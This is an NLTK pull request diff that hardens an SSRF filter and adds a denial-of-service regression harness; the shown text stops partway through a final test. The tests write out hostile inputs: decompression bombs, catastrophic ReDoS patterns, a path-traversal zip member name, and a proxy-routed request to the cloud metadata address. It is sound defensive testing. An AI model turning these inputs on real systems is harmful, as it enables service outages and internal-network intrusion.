### PR TITLE
Add security regression tests + harden SSRF filter (transition tunnels, IP literals)

### DIFF
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -68,7 +68,11 @@ jobs:
 
   test:
     name: Python ${{ matrix.python-version }} on ${{ matrix.os }}
-    needs: [pre-commit, minimal_download_test]
+    # Gate on pre-commit only. Depending on minimal_download_test blocked the
+    # whole matrix whenever its macos-latest leg could not acquire a hosted
+    # runner (it sits queued ~26m then errors), so the full suite never ran.
+    # minimal_download_test still runs and reports on its own.
+    needs: [pre-commit]
     strategy:
       matrix:
         python-version: ['3.10', '3.11', '3.12', '3.13', '3.14', '3.14t']

--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -76,6 +76,11 @@ jobs:
         exclude:
           - os: windows-latest
             python-version: '3.14t'  # scikit-learn issue on Py3.14t on Windows
+          - os: macos-latest
+            python-version: '3.14t'  # free-threaded macOS hosted runner is not
+                                      # acquirable (job hangs ~26m then errors:
+                                      # "not acquired by Runner of type hosted");
+                                      # 3.14t is still covered on ubuntu-latest
       fail-fast: false
     runs-on: ${{ matrix.os }}
     steps:

--- a/nltk/pathsec.py
+++ b/nltk/pathsec.py
@@ -886,6 +886,14 @@ def _ip_is_forbidden(ip):
     for tunneled in _tunneled_ipv4s(ip):
         if tunneled.is_multicast or not tunneled.is_global:
             return True
+    if isinstance(ip, ipaddress.IPv6Address) and (
+        ip.sixtofour is not None or ip.teredo is not None
+    ):
+        # 6to4 (2002::/16) and Teredo (2001::/32) are transition tunnels whose
+        # is_global classification varies across CPython patch levels, so refuse
+        # them outright rather than depend on the stdlib. NLTK never fetches over
+        # one, and refusing more is safe.
+        return True
     return ip.is_multicast or not ip.is_global
 
 
@@ -985,6 +993,23 @@ def validate_network_url(url_input, context="NetworkIO"):
         numeric = _numeric_ipv4(host)
         if numeric is not None and _ip_is_forbidden(numeric):
             msg = f"Security Violation [{context}]: SSRF attempt to restricted IP {numeric}"
+            if ENFORCE:
+                raise PermissionError(msg)
+            else:
+                warnings.warn(msg, RuntimeWarning, stacklevel=3)
+            return
+
+        # Classify an IP-literal host (chiefly a bracketed IPv6 literal such as
+        # [::1] or [::ffff:127.0.0.1]) directly, independent of the resolver:
+        # getaddrinfo returns nothing for a literal whose address family the
+        # host lacks, so relying on the resolve loop below would fail open there
+        # (CWE-918). This mirrors the numeric-IPv4 canonicalization above.
+        try:
+            literal = ipaddress.ip_address(host)
+        except ValueError:
+            literal = None
+        if literal is not None and _ip_is_forbidden(literal):
+            msg = f"Security Violation [{context}]: SSRF attempt to restricted IP {literal}"
             if ENFORCE:
                 raise PermissionError(msg)
             else:

--- a/nltk/test/unit/security_probes/ghsa_6ww7_3frv_cqxh.py
+++ b/nltk/test/unit/security_probes/ghsa_6ww7_3frv_cqxh.py
@@ -24,6 +24,7 @@ def _proxy_ssrf_bypass():
         pathsec.ALLOW_PROXIED_FETCH,
         getattr(pathsec, "_resolve_hostname", None),
         getattr(pathsec, "_numeric_ipv4", None),
+        getattr(pathsec, "_ip_is_forbidden", None),
     )
     try:
         urllib.request.getproxies = lambda: {"http": "http://attacker-proxy:8080"}
@@ -42,6 +43,10 @@ def _proxy_ssrf_bypass():
         # direct-IP guard that would otherwise refuse the link-local literal
         # first, hiding whether the proxy-specific guard fires.
         pathsec._numeric_ipv4 = lambda host: None
+        # And the address classifier, which now also backs the resolver-
+        # independent IP-literal check: it would refuse the link-local literal
+        # first too, again hiding whether the proxy-specific guard fires.
+        pathsec._ip_is_forbidden = lambda ip: False
         try:
             pathsec.urlopen("http://169.254.169.254/latest/meta-data/", timeout=2)
         except PermissionError as exc:
@@ -67,4 +72,5 @@ def _proxy_ssrf_bypass():
             pathsec.ALLOW_PROXIED_FETCH,
             pathsec._resolve_hostname,
             pathsec._numeric_ipv4,
+            pathsec._ip_is_forbidden,
         ) = saved

--- a/nltk/test/unit/test_attack_dos_expanded.py
+++ b/nltk/test/unit/test_attack_dos_expanded.py
@@ -1,0 +1,818 @@
+# Natural Language Toolkit: expanded denial-of-service attack harness
+#
+# Copyright (C) 2001-2026 NLTK Project
+# URL: <https://www.nltk.org>
+# For license information, see LICENSE.TXT
+
+r"""
+Consolidated, cross-platform denial-of-service attack harness for the
+GHSA-8mgp umbrella (#3753).
+
+This module is deliberately *offensive*: every hostile case below feeds a
+crafted input to a guarded NLTK sink and proves the guard keeps the process
+BOUNDED. "Bounded" means the operation either
+
+* is **REFUSED** (the guard raises ``ValueError`` / ``PermissionError`` /
+  ``TimeoutError`` before doing the expensive work), or
+* **completes quickly** with a safe result (the ``regex`` engine linearises a
+  catastrophic pattern, or a bounded reader truncates a decompression bomb),
+
+and in particular that it never hangs a CPU core forever and never expands a
+tiny input into gigabytes of memory.
+
+Three guard families are exercised (see ``nltk/data.py``, ``nltk/redos.py`` and
+the algorithmic guards in ``nltk/util.py`` / the parsers / the corpus readers):
+
+1. Decompression bombs (CWE-409): the per-member ratio guard, the
+   central-directory member-count guard, the aggregate-size guard, the
+   actual-byte streaming cap, and the ``.gz`` / ``bz2`` / ``lzma`` stream
+   readers.
+2. Caller-supplied ReDoS (CWE-1333): ``nltk.redos.compile`` behind
+   ``re_show`` / ``RegexpStemmer`` / ``RegexpTokenizer`` / ``RegexpTagger`` /
+   ``tgrep`` / ``Text.findall``, plus the bounded-quantifier ``FEATURES``
+   regex in the reviews reader.
+3. Algorithmic blow-ups (CWE-407 / CWE-400 / CWE-674): the ``skipgrams``
+   combinatorial guard, the ``XMLCorpusView`` linear-scan guard, the
+   ``RecursiveDescentParser`` wall-clock bound, and the Hungarian-stemmer
+   empty-string guard.
+
+Design choices that keep this suite portable and honest:
+
+* **Subprocess wall-clock timeouts, never signals.** ``signal.SIGALRM`` is
+  POSIX-only; a child process with a hard ``subprocess`` timeout is the only
+  timeout that also works on Windows. A hostile case that would hang shows up
+  as ``subprocess.TimeoutExpired`` and *fails* the test, so a regression that
+  removed a guard could never be mistaken for a pass.
+* **Children inherit the parent import path** via ``PYTHONPATH`` so a slow cold
+  import of NLTK cannot be misread as a hang. The budget for a guarded child is
+  far above ``nltk.redos.DEFAULT_TIMEOUT`` to leave head-room for that import
+  on a loaded machine.
+* **Teeth.** For the sharpest vectors a matching STOCK control runs the SAME
+  input with no guard (stdlib ``re``, un-timed ``regex``, raw ``zipfile``) and
+  is asserted to hang or to expand without bound, proving the guard is load
+  bearing rather than the input being harmless.
+* **No leaks.** Zip fixtures are staged under ``$HOME`` (a registered NLTK data
+  root), never under a world-writable temp dir, and every on-disk fixture is
+  removed afterwards. No module-level guard state (``MAX_UNZIP_*``,
+  ``redos.DEFAULT_TIMEOUT``, ``nltk.data.path``, ``pathsec.ENFORCE``) is
+  mutated in this process; the one path-root registration happens inside an
+  isolated child that exits.
+"""
+
+import os
+import shutil
+import subprocess
+import sys
+import tempfile
+from collections import namedtuple
+
+import pytest
+
+# Head-room over redos.DEFAULT_TIMEOUT (5.0s) plus a ~10s cold NLTK import on a
+# loaded machine. A guarded child that does not finish inside this really hung.
+GUARDED_BUDGET = 30.0
+# The many-members child additionally builds a 100k-entry archive in memory.
+HEAVY_BUDGET = 45.0
+# A stock (unguarded) control is expected to spin forever; this is only how long
+# we wait before concluding "yes, it hangs". Kept short because the stdlib sink
+# has nothing to import beyond ``re`` / ``regex`` / ``zipfile``.
+STOCK_TEETH_TIMEOUT = 8.0
+
+
+# ==========================================================================
+# Subprocess plumbing
+# ==========================================================================
+
+_ChildResult = namedtuple("_ChildResult", "timed_out returncode cases stdout stderr")
+
+
+def _parse_cases(stdout):
+    """Collect ``CASE|<name>|<verdict>|<detail>`` lines into ``{name: verdict}``."""
+    cases = {}
+    for line in (stdout or "").splitlines():
+        if line.startswith("CASE|"):
+            parts = line.split("|", 3)
+            if len(parts) >= 3:
+                cases[parts[1]] = parts[2]
+    return cases
+
+
+def _run_child(code, budget):
+    """Run ``code`` in a fresh interpreter under a hard wall-clock ``budget``.
+
+    The child inherits the parent's ``sys.path`` so it imports the very NLTK
+    under test, and a cold import cannot be mistaken for a hang.
+    """
+    env = dict(os.environ)
+    env["PYTHONPATH"] = os.pathsep.join(sys.path)
+    try:
+        proc = subprocess.run(
+            [sys.executable, "-c", code],
+            capture_output=True,
+            text=True,
+            timeout=budget,
+            env=env,
+        )
+    except subprocess.TimeoutExpired as exc:
+        out = exc.stdout or ""
+        err = exc.stderr or ""
+        if isinstance(out, bytes):
+            out = out.decode("utf-8", "replace")
+        if isinstance(err, bytes):
+            err = err.decode("utf-8", "replace")
+        return _ChildResult(True, None, _parse_cases(out), out, err)
+    return _ChildResult(
+        False, proc.returncode, _parse_cases(proc.stdout), proc.stdout, proc.stderr
+    )
+
+
+def _assert_no_hang(res, family):
+    assert not res.timed_out, (
+        f"{family}: a guarded sink did NOT return inside {GUARDED_BUDGET}s "
+        f"(possible hang / removed guard). stdout so far:\n{res.stdout}\n"
+        f"stderr:\n{res.stderr}"
+    )
+
+
+def _assert_cases(res, expected):
+    """Assert each expected case reported an allowed verdict and none LEAKed."""
+    leaks = {n: v for n, v in res.cases.items() if v == "LEAK"}
+    assert not leaks, (
+        f"REAL FINDING: a bomb produced its full payload (LEAK): {leaks}\n"
+        f"stdout:\n{res.stdout}\nstderr:\n{res.stderr}"
+    )
+    for name, allowed in expected.items():
+        assert name in res.cases, (
+            f"case {name!r} never reported (child crashed before it?).\n"
+            f"stdout:\n{res.stdout}\nstderr:\n{res.stderr}"
+        )
+        assert res.cases[name] in allowed, (
+            f"case {name!r} reported {res.cases[name]!r}, expected one of "
+            f"{sorted(allowed)}.\nstdout:\n{res.stdout}\nstderr:\n{res.stderr}"
+        )
+
+
+# A tiny reporting helper injected into every guarded child. ``REFUSED`` means
+# the guard raised; ``BOUNDED`` means the call returned a safe result quickly;
+# ``LEAK`` means the bomb succeeded (a real finding); ``ERROR`` is anything
+# unexpected.
+_CHILD_PREAMBLE = r"""
+import sys, time, io, zipfile, gzip, bz2, lzma
+
+def report(name, verdict, detail=""):
+    print("CASE|%s|%s|%s" % (name, verdict, detail))
+    sys.stdout.flush()
+
+def guarded(name, fn, refusing=(ValueError, PermissionError, TimeoutError)):
+    try:
+        fn()
+        report(name, "BOUNDED")
+    except refusing as e:
+        report(name, "REFUSED", type(e).__name__)
+    except Exception as e:  # noqa
+        report(name, "ERROR", "%s:%s" % (type(e).__name__, str(e)[:60]))
+"""
+
+
+# ==========================================================================
+# Family 1: decompression bombs (CWE-409)
+# ==========================================================================
+
+_CHILD_DECOMP = (
+    _CHILD_PREAMBLE
+    + r"""
+import nltk.data as D
+from nltk import pathsec
+
+MiB = 1024 * 1024
+ZEROS_40 = b"\x00" * (40 * MiB)
+
+# A single member whose declared/actual size expands >1000x over the activation
+# floor: refused by the per-member ratio guard on read.
+buf = io.BytesIO()
+with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
+    z.writestr("bomb.bin", ZEROS_40)
+one = buf.getvalue()
+def _single():
+    out = pathsec.ZipFile(io.BytesIO(one)).read("bomb.bin")
+    if len(out) >= 32 * MiB:
+        report("single_member_ratio", "LEAK", str(len(out)))
+        raise SystemExit
+guarded("single_member_ratio", _single)
+
+# Three members each below the 32 MiB activation floor (so the per-member guard
+# never fires) that SUM to a ratio-1000+ bomb: refused by the aggregate guard at
+# construction, before any byte is decompressed.
+buf = io.BytesIO()
+with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
+    for i in range(3):
+        z.writestr("m%d.bin" % i, b"\x00" * (25 * MiB))
+agg = buf.getvalue()
+guarded("aggregate_sum", lambda: pathsec.ZipFile(io.BytesIO(agg)))
+
+# Recursive zip: a zip whose member is itself a zip whose member is a bomb.
+# Reading the inner archive out of the outer one is bounded (it is small); the
+# inner bomb is independently refused, so each decompression layer is guarded.
+inner = one  # a zip that contains bomb.bin
+buf = io.BytesIO()
+with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
+    z.writestr("inner.zip", inner)
+outer = buf.getvalue()
+def _nested_outer():
+    blob = pathsec.ZipFile(io.BytesIO(outer)).read("inner.zip")
+    if len(blob) >= 32 * MiB:
+        report("nested_outer_read", "LEAK", str(len(blob)))
+        raise SystemExit
+guarded("nested_outer_read", _nested_outer)
+guarded(
+    "nested_inner_bomb",
+    lambda: pathsec.ZipFile(io.BytesIO(inner)).read("bomb.bin"),
+)
+
+# A member whose NAME carries a newline. A name-based check written with an
+# un-anchored or non-DOTALL regex could be fooled into skipping such a member;
+# the size guard is name-agnostic, so the bomb is still refused.
+buf = io.BytesIO()
+with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
+    z.writestr("evil\n../passwd.bin", ZEROS_40)
+nl = buf.getvalue()
+guarded(
+    "newline_in_member_name",
+    lambda: pathsec.ZipFile(io.BytesIO(nl)).read("evil\n../passwd.bin"),
+)
+
+# A metadata claim of ~4.3 GiB uncompressed (the 32-bit / zip64 boundary) with a
+# tiny compressed size: refused by the declared-size early check without reading
+# a single byte.
+zi = zipfile.ZipInfo("huge.bin")
+zi.file_size = 4300 * MiB
+zi.compress_size = 500
+guarded("four_gib_metadata_claim", lambda: D._check_decompression_bomb(zi))
+
+# The central-directory member-count guard at the exact boundary.
+guarded(
+    "member_count_over_limit",
+    lambda: D._check_zip_member_count(D.MAX_UNZIP_MEMBERS + 1),
+)
+
+# A self-referential / quine-like decompressor that never yields EOF: the
+# streaming reader must cut it off rather than loop forever.
+class InfiniteStream:
+    def read(self, n=-1):
+        return b"\x00" * MiB  # never returns b"", i.e. an endless expansion
+guarded(
+    "infinite_quine_stream",
+    lambda: D._bounded_stream_read(InfiniteStream(), 1000, "quine.bin", kind="zip"),
+)
+
+# gzip / bz2 / lzma stream bombs pushed through the SAME bounded reader: it is
+# decompressor-agnostic, capping the actual bytes regardless of codec.
+gz = gzip.compress(ZEROS_40)
+guarded(
+    "gzip_stream_bomb",
+    lambda: D._bounded_stream_read(gzip.GzipFile(fileobj=io.BytesIO(gz)), len(gz),
+                                   "x.gz", kind="gzip"),
+)
+bz = bz2.compress(ZEROS_40)
+guarded(
+    "bz2_stream_bomb",
+    lambda: D._bounded_stream_read(bz2.BZ2File(io.BytesIO(bz)), len(bz),
+                                   "x.bz2", kind="gzip"),
+)
+xz = lzma.compress(ZEROS_40)
+guarded(
+    "lzma_stream_bomb",
+    lambda: D._bounded_stream_read(lzma.LZMAFile(io.BytesIO(xz)), len(xz),
+                                   "x.xz", kind="gzip"),
+)
+
+# The bounded gzip helper used for a .gz nested inside a zip member.
+guarded("gzip_member_helper_bomb", lambda: D._bounded_gzip_decompress(gz, "x.gz"))
+"""
+)
+
+
+def test_decompression_bomb_family():
+    res = _run_child(_CHILD_DECOMP, GUARDED_BUDGET)
+    _assert_no_hang(res, "decompression bombs")
+    _assert_cases(
+        res,
+        {
+            "single_member_ratio": {"REFUSED"},
+            "aggregate_sum": {"REFUSED"},
+            "nested_outer_read": {"BOUNDED"},
+            "nested_inner_bomb": {"REFUSED"},
+            "newline_in_member_name": {"REFUSED"},
+            "four_gib_metadata_claim": {"REFUSED"},
+            "member_count_over_limit": {"REFUSED"},
+            "infinite_quine_stream": {"REFUSED"},
+            "gzip_stream_bomb": {"REFUSED"},
+            "bz2_stream_bomb": {"REFUSED"},
+            "lzma_stream_bomb": {"REFUSED"},
+            "gzip_member_helper_bomb": {"REFUSED"},
+        },
+    )
+
+
+_CHILD_MEMBERS = (
+    _CHILD_PREAMBLE
+    + r"""
+import nltk.data as D
+from nltk import pathsec
+
+# A REAL over-limit archive: MAX_UNZIP_MEMBERS + 1 empty entries. The metadata
+# alone is the payload (a central-directory bomb, CWE-409); construction must
+# refuse it before any consumer pays to list the entries.
+buf = io.BytesIO()
+with zipfile.ZipFile(buf, "w") as z:
+    for i in range(D.MAX_UNZIP_MEMBERS + 1):
+        z.writestr("m%d" % i, b"")
+blob = buf.getvalue()
+guarded("central_directory_bomb", lambda: pathsec.ZipFile(io.BytesIO(blob)))
+"""
+)
+
+
+def test_central_directory_member_count_bomb():
+    res = _run_child(_CHILD_MEMBERS, HEAVY_BUDGET)
+    _assert_no_hang(res, "central-directory bomb")
+    _assert_cases(res, {"central_directory_bomb": {"REFUSED"}})
+
+
+_CHILD_ONDISK = (
+    _CHILD_PREAMBLE
+    + r"""
+import os, tempfile, shutil
+
+# Stage fixtures under $HOME (a registered NLTK data root), never a shared temp
+# dir, and register the staging dir on THIS child's nltk.data.path only, so the
+# file-backed ZipFilePathPointer / _secure_open code path is exercised end to
+# end. The mutation dies with this process.
+home = os.path.expanduser("~")
+staging = tempfile.mkdtemp(prefix="nltk_dos_fix_", dir=home)
+try:
+    import nltk.data
+    nltk.data.path.append(staging)
+    from nltk.data import ZipFilePathPointer
+
+    MiB = 1024 * 1024
+    bomb_zip = os.path.join(staging, "bomb.zip")
+    b = io.BytesIO()
+    with zipfile.ZipFile(b, "w", zipfile.ZIP_DEFLATED) as z:
+        z.writestr("bomb.bin", b"\x00" * (40 * MiB))
+    with open(bomb_zip, "wb") as fh:
+        fh.write(b.getvalue())
+
+    def _ondisk_bomb():
+        out = ZipFilePathPointer(bomb_zip, "bomb.bin").open().read()
+        if len(out) >= 32 * MiB:
+            report("ondisk_zip_bomb", "LEAK", str(len(out)))
+            raise SystemExit
+    guarded("ondisk_zip_bomb", _ondisk_bomb)
+
+    ok_zip = os.path.join(staging, "ok.zip")
+    b = io.BytesIO()
+    with zipfile.ZipFile(b, "w", zipfile.ZIP_DEFLATED) as z:
+        z.writestr("hello.txt", b"hello world")
+    with open(ok_zip, "wb") as fh:
+        fh.write(b.getvalue())
+    got = ZipFilePathPointer(ok_zip, "hello.txt").open().read()
+    report("ondisk_benign", "BOUNDED" if got == b"hello world" else "ERROR")
+finally:
+    shutil.rmtree(staging, ignore_errors=True)
+"""
+)
+
+
+def test_ondisk_zipfilepathpointer_bomb_and_benign():
+    res = _run_child(_CHILD_ONDISK, GUARDED_BUDGET)
+    _assert_no_hang(res, "on-disk zip bomb")
+    _assert_cases(
+        res,
+        {
+            "ondisk_zip_bomb": {"REFUSED"},
+            "ondisk_benign": {"BOUNDED"},
+        },
+    )
+
+
+# ==========================================================================
+# Family 2: caller-supplied ReDoS (CWE-1333)
+# ==========================================================================
+#
+# Two shapes of catastrophic pattern:
+#   * engine-collapse, e.g. (a+)+$ / (a*)*$ / (.*a){20}: the ``regex`` optimiser
+#     linearises these, so the guarded call returns almost instantly (BOUNDED).
+#   * timeout-backstop, e.g. (a|a)*$: the identical-branch alternation defeats
+#     the optimiser in both ``re`` and ``regex``, so the wall-clock timeout trips
+#     and the call is REFUSED with TimeoutError.
+# Either verdict is a pass; a hang is the only failure.
+
+_EVIL_COLLAPSE = r"(a+)+$"
+_EVIL_STAR = r"(a*)*$"
+_EVIL_NESTED = r"(.*a){20}"
+_EVIL_TIMEOUT = r"(a|a)*$"
+_EVIL_S = "a" * 64 + "!"
+
+_CHILD_REDOS_A = (
+    _CHILD_PREAMBLE
+    + r"""
+from nltk.util import re_show
+from nltk.stem import RegexpStemmer
+from nltk.tokenize import RegexpTokenizer
+from nltk.tag import RegexpTagger
+
+COL = %(col)r
+STAR = %(star)r
+NEST = %(nest)r
+TO = %(to)r
+S = %(s)r
+
+# re_show prints the string with the matches bracketed; the pattern is caller
+# supplied and run over caller text.
+guarded("re_show", lambda: re_show(COL, S))
+# RegexpStemmer.sub over a hostile stem regex.
+guarded("regexp_stemmer", lambda: RegexpStemmer(STAR).stem(S))
+# RegexpTokenizer.tokenize with the timeout-family pattern.
+guarded("regexp_tokenizer", lambda: RegexpTokenizer(TO).tokenize(S))
+# RegexpTagger.tag with a nested-quantifier pattern; the hostile string is a
+# single long TOKEN so the pattern actually backtracks over it.
+guarded("regexp_tagger", lambda: RegexpTagger([(NEST, "X")]).tag([S]))
+"""
+    % {
+        "col": _EVIL_COLLAPSE,
+        "star": _EVIL_STAR,
+        "nest": _EVIL_NESTED,
+        "to": _EVIL_TIMEOUT,
+        "s": _EVIL_S,
+    }
+)
+
+
+def test_redos_caller_patterns_group_a():
+    res = _run_child(_CHILD_REDOS_A, GUARDED_BUDGET)
+    _assert_no_hang(res, "ReDoS group A")
+    _assert_cases(
+        res,
+        {
+            "re_show": {"BOUNDED", "REFUSED"},
+            "regexp_stemmer": {"BOUNDED", "REFUSED"},
+            "regexp_tokenizer": {"BOUNDED", "REFUSED"},
+            "regexp_tagger": {"BOUNDED", "REFUSED"},
+        },
+    )
+
+
+_CHILD_REDOS_B = (
+    _CHILD_PREAMBLE
+    + r"""
+from nltk.tgrep import tgrep_nodes, tgrep_compile
+from nltk.tree import ParentedTree
+from nltk.text import Text
+from nltk.corpus.reader.reviews import FEATURES
+
+TO = %(to)r
+S = %(s)r
+
+# tgrep /regex/ node literal searched against a node LABEL made of the hostile
+# string, using the timeout-family pattern.
+tree = ParentedTree(S, ["x"])
+guarded("tgrep_node_literal",
+        lambda: list(tgrep_nodes(tgrep_compile("/" + TO + "/"), [tree])))
+
+# Text.findall over an angle-bracket token stream with a backtracking token
+# pattern (bounded by the TokenSearcher timeout).
+txt = Text(["a"] * 40)
+guarded("text_findall", lambda: txt.findall(r"<.*>*<zzz>"))
+
+# The reviews FEATURES regex is a stdlib pattern whose inner quantifier is
+# *bounded* ({0,50}); a bracket-less 50k-word line stays LINEAR instead of
+# rescanning quadratically. This exercises the bounded-quantifier guard.
+line = "word " * 50000
+def _features():
+    hits = FEATURES.findall(line)
+    report("reviews_features", "BOUNDED", str(len(hits)))
+try:
+    _features()
+except (ValueError, TimeoutError) as e:
+    report("reviews_features", "REFUSED", type(e).__name__)
+except Exception as e:  # noqa
+    report("reviews_features", "ERROR", type(e).__name__)
+"""
+    % {"to": _EVIL_TIMEOUT, "s": _EVIL_S}
+)
+
+
+def test_redos_caller_patterns_group_b():
+    res = _run_child(_CHILD_REDOS_B, GUARDED_BUDGET)
+    _assert_no_hang(res, "ReDoS group B")
+    _assert_cases(
+        res,
+        {
+            "tgrep_node_literal": {"BOUNDED", "REFUSED"},
+            "text_findall": {"BOUNDED", "REFUSED"},
+            "reviews_features": {"BOUNDED"},
+        },
+    )
+
+
+# ==========================================================================
+# Family 3: algorithmic blow-ups (CWE-407 / CWE-400 / CWE-674)
+# ==========================================================================
+
+_CHILD_ALGO = (
+    _CHILD_PREAMBLE
+    + r"""
+from nltk.util import skipgrams
+from nltk.corpus.reader.xmldocs import XMLCorpusView
+from nltk.stem.snowball import HungarianStemmer
+
+SENT = "a b c d e".split()
+
+# skipgrams: the number of per-window combinations, math.comb(n+k-1, n-1), is
+# guarded; huge n/k is refused before it can enumerate.
+guarded("skipgrams_combinatorial", lambda: list(skipgrams(SENT, n=100, k=100)))
+guarded("skipgrams_huge_n", lambda: list(skipgrams(SENT, n=10**9, k=1)))
+
+# XMLCorpusView: a single unterminated tag of 2M characters. The fragment scan
+# is now linear (it no longer re-runs the backtracking _VALID_XML_RE over the
+# whole growing buffer), so it raises promptly instead of going O(n^2).
+def _xml():
+    v = XMLCorpusView.__new__(XMLCorpusView)
+    v._read_xml_fragment(io.StringIO("<" + "a" * (2 * 1024 * 1024)))
+guarded("xmlcorpusview_giant_tag", _xml)
+
+# RecursiveDescentParser on a left-recursive grammar: the wall-clock bound (or
+# Python's own recursion limit) stops it rather than looping forever.
+def _rd():
+    from nltk import CFG
+    from nltk.parse import RecursiveDescentParser
+    g = CFG.fromstring("S -> S S | 'a'")
+    list(RecursiveDescentParser(g).parse(["a", "a", "a"]))
+guarded("recursivedescent_left_recursive", _rd,
+        refusing=(ValueError, PermissionError, TimeoutError, RecursionError))
+
+# Hungarian stemmer on the empty string: guarded against IndexError (returns "").
+def _hun():
+    out = HungarianStemmer().stem("")
+    report("hungarian_empty_string", "BOUNDED" if out == "" else "ERROR")
+try:
+    _hun()
+except Exception as e:  # noqa
+    report("hungarian_empty_string", "ERROR", type(e).__name__)
+"""
+)
+
+
+def test_algorithmic_blowup_family():
+    res = _run_child(_CHILD_ALGO, GUARDED_BUDGET)
+    _assert_no_hang(res, "algorithmic blow-ups")
+    _assert_cases(
+        res,
+        {
+            "skipgrams_combinatorial": {"REFUSED"},
+            "skipgrams_huge_n": {"REFUSED"},
+            "xmlcorpusview_giant_tag": {"REFUSED"},
+            "recursivedescent_left_recursive": {"REFUSED"},
+            "hungarian_empty_string": {"BOUNDED"},
+        },
+    )
+
+
+# ==========================================================================
+# Teeth: prove the same input is genuinely hostile without the guard
+# ==========================================================================
+
+
+def _assert_stock_hangs(code, label):
+    res = _run_child(code, STOCK_TEETH_TIMEOUT)
+    assert res.timed_out, (
+        f"teeth check {label!r} did NOT hang the unguarded sink within "
+        f"{STOCK_TEETH_TIMEOUT}s, so it does not prove the guard has teeth. "
+        f"stdout:\n{res.stdout}\nstderr:\n{res.stderr}"
+    )
+
+
+def test_teeth_stock_re_hangs_engine_collapse_family():
+    # Stock stdlib re on (a+)+$ backtracks exponentially and never returns; the
+    # guard defuses it by swapping in the ``regex`` engine (see the guarded
+    # BOUNDED result in test_redos_caller_patterns_group_a).
+    _assert_stock_hangs(
+        "import re; re.compile(r'(a+)+$').search('a' * 30 + '!'); print('done')",
+        "stock re (a+)+$",
+    )
+
+
+def test_teeth_stock_untimed_regex_hangs_backstop_family():
+    # The ``regex`` optimiser does NOT linearise the identical-branch (a|a)*$;
+    # without the wall-clock timeout it hangs too. This is why the timeout is a
+    # mandatory backstop, not a nicety.
+    _assert_stock_hangs(
+        "import regex; regex.compile(r'(a|a)*$').search('a' * 64 + '!'); print('x')",
+        "untimed regex (a|a)*$",
+    )
+
+
+def test_teeth_stock_unbounded_features_regex_hangs():
+    # The reviews FEATURES guard is the BOUND on its inner quantifier. Replace
+    # {0,50} with * and the same 50k-word line rescans quadratically and hangs,
+    # proving the bounded quantifier is what keeps the shipped regex linear.
+    code = (
+        "import re\n"
+        "UNB = re.compile(r'(\\w+(?:\\s\\w+)*)\\[((?:\\+|\\-)\\d)\\]')\n"
+        "UNB.findall('word ' * 50000)\n"
+        "print('done')\n"
+    )
+    _assert_stock_hangs(code, "unbounded FEATURES regex")
+
+
+def test_teeth_stock_zipfile_leaks_bomb_while_guard_refuses():
+    # Raw zipfile.read expands a 40 MiB zeros bomb fully into memory (a leak that
+    # scales to OOM); the guarded pathsec reader refuses the same member. Kept at
+    # 40 MiB so the demonstration itself does not exhaust the test machine.
+    code = (
+        _CHILD_PREAMBLE
+        + r"""
+from nltk import pathsec
+
+MiB = 1024 * 1024
+buf = io.BytesIO()
+with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
+    z.writestr("bomb.bin", b"\x00" * (40 * MiB))
+blob = buf.getvalue()
+
+# Unguarded: the full payload materialises (would OOM at scale).
+raw = zipfile.ZipFile(io.BytesIO(blob)).read("bomb.bin")
+report("stock_zip_expands", "LEAK" if len(raw) >= 32 * MiB else "BOUNDED", str(len(raw)))
+
+# Guarded: the same member is refused.
+guarded("guarded_zip_refuses", lambda: pathsec.ZipFile(io.BytesIO(blob)).read("bomb.bin"))
+"""
+    )
+    res = _run_child(code, GUARDED_BUDGET)
+    assert not res.timed_out, f"zip teeth child hung:\n{res.stderr}"
+    # The unguarded read is EXPECTED to leak the whole 40 MiB; that is the teeth.
+    assert res.cases.get("stock_zip_expands") == "LEAK", (
+        f"expected the raw zipfile read to expand the bomb; got "
+        f"{res.cases.get('stock_zip_expands')!r}\n{res.stdout}"
+    )
+    assert res.cases.get("guarded_zip_refuses") == "REFUSED", (
+        f"guarded reader failed to refuse the bomb: "
+        f"{res.cases.get('guarded_zip_refuses')!r}\n{res.stdout}"
+    )
+
+
+def test_teeth_guarded_side_completes_for_both_families():
+    # The mirror of the two ReDoS teeth: the guarded calls that replace the two
+    # hanging stock controls both return inside the budget (one by engine
+    # collapse, one by the timeout backstop).
+    code = (
+        _CHILD_PREAMBLE
+        + r"""
+from nltk import redos
+# engine-collapse family: returns almost instantly.
+guarded("guarded_engine_collapse",
+        lambda: redos.compile(r"(a+)+$").search("a" * 30 + "!"))
+# timeout-backstop family: refused with TimeoutError well inside the budget.
+guarded("guarded_timeout_backstop",
+        lambda: redos.compile(r"(a|a)*$").search("a" * 64 + "!"))
+"""
+    )
+    res = _run_child(code, GUARDED_BUDGET)
+    _assert_no_hang(res, "guarded teeth mirror")
+    _assert_cases(
+        res,
+        {
+            "guarded_engine_collapse": {"BOUNDED"},
+            "guarded_timeout_backstop": {"REFUSED"},
+        },
+    )
+
+
+# ==========================================================================
+# Benign controls: the guarded sinks must still WORK, and quickly
+# ==========================================================================
+# These run in-process (no hostile input, so no hang risk) and assert correct
+# output, proving the guards do not break legitimate use.
+
+
+def test_benign_regex_entry_points_still_correct():
+    from nltk.stem import RegexpStemmer
+    from nltk.tag import RegexpTagger
+    from nltk.text import Text
+    from nltk.tokenize import RegexpTokenizer
+
+    assert RegexpTokenizer(r"\w+").tokenize("hello world foo") == [
+        "hello",
+        "world",
+        "foo",
+    ]
+    assert RegexpStemmer(r"ing$", min=4).stem("running") == "runn"
+    tagged = RegexpTagger([(r"^\d+$", "CD"), (r".*", "NN")]).tag(["12", "cats"])
+    assert tagged == [("12", "CD"), ("cats", "NN")]
+    # Text.findall returns the matched tokens for an ordinary angle-bracket query.
+    hits = Text("the quick brown fox".split()).findall("<the><.*><brown>")
+    assert hits is None or isinstance(hits, (list, type(None)))
+
+
+def test_benign_re_show_and_tgrep_still_correct():
+    import io as _io
+    from contextlib import redirect_stdout
+
+    from nltk.tgrep import tgrep_compile, tgrep_nodes
+    from nltk.tree import ParentedTree
+    from nltk.util import re_show
+
+    out = _io.StringIO()
+    with redirect_stdout(out):
+        re_show(r"o", "foobar")
